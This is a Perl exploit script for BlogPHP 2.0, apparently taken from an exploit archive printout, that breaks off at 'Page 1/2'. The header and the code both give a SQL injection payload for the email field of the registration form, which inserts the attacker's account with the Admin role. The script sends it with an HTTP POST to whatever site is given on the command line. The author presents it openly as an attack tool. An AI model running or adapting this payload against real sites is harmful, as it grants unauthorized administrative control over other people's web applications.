1 #!/usr/bin/perl
2 # BlogPHP 2.0 Remote Privilege Escalation Exploit
3 # Author : Cod3rZ
4 # Site : http://cod3rz.helloweb.eu
5 # Site : http://devilsnight.altervista.org
6 # Cuz We Back Rude This Time
7 #
8 # Privilege Escalation
9 # Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with:
10 # username=[yourusername]&password=[yourpass]&email=[yourmail]’,’Admin’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’)/*
11 #
12 # There are other bugs, find them yourself
13 #
14 # Usage: perl bp.pl <site> <user> <pass> <mail>
15
16 system(’cls’);
17 #system(’clear’);
18
19 use LWP::UserAgent;
20 use HTTP::Request::Common;
21
22 $site = $ARGV[0];
23 $user = $ARGV[1];
24 $pass = $ARGV[2];
25 $mail = $ARGV[3];
26
27 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
28 print " BlogPHP 2.0 Remote Privilege Escalation Exploit \n";
29 print " Powered by Cod3rZ \n";
30 print " http://cod3rz.helloweb.eu \n";
31 print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
32
33 sub usage {
34
print " Usage: perl bp.pl <site> <user> <pass> <mail> \n";
35
print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
36 }
37 if(!$mail) { &usage; }
38 else {
39
if ($site !~ /http:\/\//) { $site = "http://".$site; }
40
41
print " Site: $site \n";
42
print " User: $user \n";
43
print " Pass: $pass \n";
44
print " Mail: $mail \n";
45
print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
46
print " Please Wait \n";
47
print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
48
49
$ua = LWP::UserAgent−>new;
50
$lwp = $ua−>request(POST $site.’index.php?act=register2’,
51
[ username => $user, password => $pass, email => $mail."’,’Admin’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’)/*" ]);
52
Page 1/2
BlogPHP 2.0 Remote Privilege Escalation Exploit
Cod3rZ
06/23/